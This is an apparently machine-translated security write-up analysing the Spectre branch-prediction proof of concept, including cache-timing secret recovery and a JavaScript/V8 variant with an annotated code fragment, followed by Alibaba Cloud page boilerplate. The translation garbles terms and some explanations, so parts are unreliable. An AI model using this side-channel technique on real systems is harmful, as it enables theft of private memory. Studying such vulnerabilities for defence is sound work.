Detailed analysis of CPU vulnerability Spectre

Source: Internet
Author: User

Detailed analysis of CPU vulnerability Spectre
Preface

Alpha lab researchers combined the POC to further analyze the vulnerability principles, procedures, and details.

In this article, we will analyze the key points of each link in the POC and all the details of the vulnerability, including the cause of the vulnerability formation, the idea and method of the vulnerability attack, and the process of the vulnerability attack, in addition, how to exploit this vulnerability in a browser and what impact does it cause.

2. POC process Introduction

First introduce the poc Execution Process

 
(Fig. 2.1)

Figure 2.1 shows a piece of code that exploits the branch execution vulnerability. this code can be budgeted for and speculative in the branch. What we need to obtain is the secret "Topsec test this vul!" in the memory !! "This character. The T address in Topsec is represented by addr (T ).

 
(Fig. 2.2)

1 In Figure 2.2 (malicious_x will be passed into victim_function, because malicious_x = addr (T)-addr (array1), so array1 [malicious_x] = T, this principle is related to array addressing. As long as we know that array1 [x] is the "T" in our secret, and normally, if x is larger than the size of array1_, array1 [x] cannot be read, however, if we perform a training to make the first few times of the x value smaller than the arraytheon size, and then put it into malicious_x, this cycle triggers the branch budget several times, and the cpu budget is much lower than the arraytheon size, when malicious_x is placed again (this malicious_x is actually larger than the arraytheon size), the cpu assumes that malicious_x is smaller than array1_size, resulting in the speculative execution of the read (the value of array1 [x] is * 512) it is put into array2 as a subscript, but the system is protected, because malicious_x has exceeded the size of the array array1, but the data read by computing in the CPU cache is stored in the CPU cache, because of the exception, no real execution is written to the memory. This is the cause of the vulnerability. The data below will be explained in more detail.

In figure 2.2, len = 24 in number 2 is our "Topsec test this vul !! The first offset of secret A0 Reading at malicious_x = 00000000000000A0...

Figure 2.2 readMemoryByte function shows three parameters: the first is the secret address, the vulue is the secrect value, and the score is the score value.

The following describes how attackers simulate a training set to allow the CPU to execute branch prediction and speculative execution.

 
(Fig. 2.3)

Figure 2.3 numbers 1 and 3 are used to clear the array in the cpu cache. Figure 2.3 Number 2 is the value of our training set, starts to 7, and then the decreasing cycle does not exceed the size of the arraytheon 16, for each training five groups, each group is placed in the secret address on the sixth. Figure 2.3, numbers 4, 5, and 6 indicate the formula for decreasing the x value from 7 and training the five groups, figure 2.3 Number 7 calls a function with a vulnerability. How to trigger a vulnerability will be discussed later.

Iii. Detailed introduction to vulnerability principles

The vulnerability is triggered by branch prediction.

if (x < array1_size)

What is prediction? Some data provides the basis for judgment to deduce that it is prediction.

For example, there is a dataset x, which can be forged by attackers. attackers have designed many datasets smaller than arraytheon size for the system to execute the branch prediction function, make the branch prediction result always be x smaller than arraytheon size. Here the size of arraytheon size is 16, and the unsigned int arraytheon size is 16;

The figure below shows the value of x I printed,

X is first put into victim_function (x) from 7. Each cycle has five sets of training sets, and 7 is the first training set. In this training set, 5 7 is added each time, the sixth option is put into malicious_x, that is, A0. The first five times in the victim_function are 5 7 <array1_size = 16, which is the branch prediction function of CPU training, let the cpu branch predict that x is smaller than the value of arraytheon size. Then, the sixth one suddenly adds a value greater than the size of arraytheon, that is, malicious_x = 0xA0. As a result, an exception is thrown during cross-border access, however, at this time, we assume that the execution has put "T * 512" as the array subscript of array2 and put the value in the cup cache, but it is not actually executed, if you print the value of x in the judgment, you will find that there will be no malicious_X, only 0 ~ 15. Because the system is still protected, the cpu will not write the calculated value into the memory after an exception is found. Otherwise, this vulnerability will not be able to read data alone. Without this protection layer, this vulnerability has a greater impact.

The following training set is decreasing (, etc ...) , Each group repeats until we find the expected result. The reason for training so many groups is that the more training, the higher the success rate of making the branch prediction run based on the attacker's logic, simply put, one group cannot be two groups, two groups cannot be three groups until the calculation is completed.

The following describes the bypass attacks in the readMemoryByte function,

 

Because the value of the subscript array1 [malicious_x] * 512 of array2 is already in the cache of the cpu, and then the access speed of which address in the array array2 is faster is probably our secret.

The reason why secret can be obtained quickly is that the data in the address & array2 [array1 [malicious_x] * 512] is already in the cpu cache, at the same time, the number of training (1 ~ 15) cache in the cpu (see Figure 2.3-3 ). When the Cpu accesses array2, it first accesses whether there is in the cpu cache, and no data is in the cache before reading data in the memory. This is the significance of the existence of the cpu cache, because the traditional memory access speed is slow, this cache mechanism can improve the computing speed of the cpu. Then, our time2 is actually the time difference for accessing array2 data. If the time difference is smaller than a threshold value (this threshold value must be different for different CPUs and different Resolvers ), in addition, there will be a rule of time. If time2 is less than or equal to this threshold, we can think that the access time of array2 at this time is faster than the access time not in the cpu cache, because 1 ~ 15. The cpu cache is cleared, leaving only malicous_X In the cpu cache. If the access time is fast, in this case, the subscript in array2 is the secret we are looking.

The method for searching for secret is that mix_ I in array2 [mix_ I * 512] is the secret we are looking for, because array2 [value (T) * 512], however, it only takes time to determine which mix_ I is a secret. If you hit the score, you should add one to the score and then filter the hits, we can see that the high hit rate is greater than or equal to 2 times, and the lower hit rate is 5, or only when the highest hit score is 2 indicates that the hit rate has reached our needs.

4. Javascript attack chrome

The above Attack Process is to load js scripts in a browser to obtain private memory. When a browser web page is embedded with malicious JavaScript code, you can obtain private data in the browser, for example, the password of a personal login credential. In the original English version, we mentioned the attack in chrome. Chrome uses the v8 engine, which compiles javascript into machine code before execution to improve performance.

After analysis, the application is basically the same as Spectre in logic. Index is first put into the simpleByteArray. put a small number of lengths into malicious_x, let the cpu predict that malicious_X is smaller than the length, and then speculate that the code after execution, the subsequent calculations and assignments are only placed in the cpu cache, there is no actual execution. You can print malicious_X after judgment. It is definitely not possible to print the malicious_x value. This principle is the same as above, next, let's analyze the details of specific vulnerabilities through compilation.

First, let's look at the function that triggers the prediction execution.

If (index <simpleByteArray. length)

{

Index = simpleByteArray [index | 0];

Index = (index * TABLE1_STRIDE) | 0) & (TABLE1_BYTES-1) | 0;

LocalJunk ^ = probeTable [index | 0] | 0;

}

After V8 compiles the machine code:

1 cmpl r15, [rbp-0xe0];

Compare the size of index and simpleByteArray. length

2 jnc 0x24dd099bb870;

If the index is greater than or equal to the length

3 REX. W leaq rsi, [r12 + rdx * 1];

Set the address of the first byte of rsi = r12 + rdx = simpleByteArray to be similar to the ADDR (T) above)

4 movzxbl rsi, [rsi + r15 * 1];

Read data from rsi + r15 (= base address + index)

5 shll rsi, 12;

Rsi * 4096 = TABLE1_STRIDE, which shifts the value to 12 bytes left.

6 andl rsi, 0x1ffffff;

This is, the first three digits of rsi are cleared to 0, so that the length of probeTable data cannot exceed the length of probeTable. The probeTable here is the same as the array2 in Spectre, and cannot exceed probeTable (array2) because of the exception, we can't speculate that the execution will put our malicious_X into the cpu cache.

7 movzxbl rsi, [rsi + r8 * 1];

Reading data from probeTable is the same as reading array2.

8 xorl rsi, rdi;

XOR the read result onto localJunk

Returns an exclusive or operation between the read result and localjunk.

9 REX. W movq rdi, rsi;

Then place the localjunk In the rdi register.

Summary:

Spectria attacks take advantage of the cpu's prediction and execution, leading to the early release of private data to the cpu cache. However, because the protection mechanism does not provide the ability to write data, at the same time, we do not have the permission to directly read data in the cpu cache, but we can determine by calculating the access time of the array to obtain the private data put before the subscript. Similarly, for browsers, the vulnerability trigger principle is the same as the poc in C language, but because javascript is a scripting language, there are many deficiencies, and the vulnerability needs to be executed in different forms, for example, we can see that each array bottom mark has an operation or operation with 0, and the result is still itself, but the data type is converted to int, otherwise, an error occurs when the array subscript of javascript cannot obtain the char type.

Some functions in C poc do not exist in javascript, such as the time calculation function and the cpu cache clearing function. However, they can all be compensated in other forms, so that they can finally obtain private data.

What we can imagine is that when browsing a website, our personal data is secretly stolen, and because of the cpu vulnerability, the entire platform is down, and the scope and influence are very large.

Related:

All Raspberry Pi devices are not affected by the Meltdown and Spectre vulnerabilities.

Complete Guide: How to fix Metldown And Spectre vulnerabilities on Windows

SUSE issued a statement on how to deal with Meltdown and Spectre CPU vulnerabilities in the system and openSUSE.

Canonical is about to release the Meltdown and Spectre vulnerability patches for all Ubuntu versions.

Meltdown and Spectre are two serious hardware errors, and billions of devices are at risk of attacks.

Red Hat says the Meltdown and Spectre vulnerabilities may affect performance.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.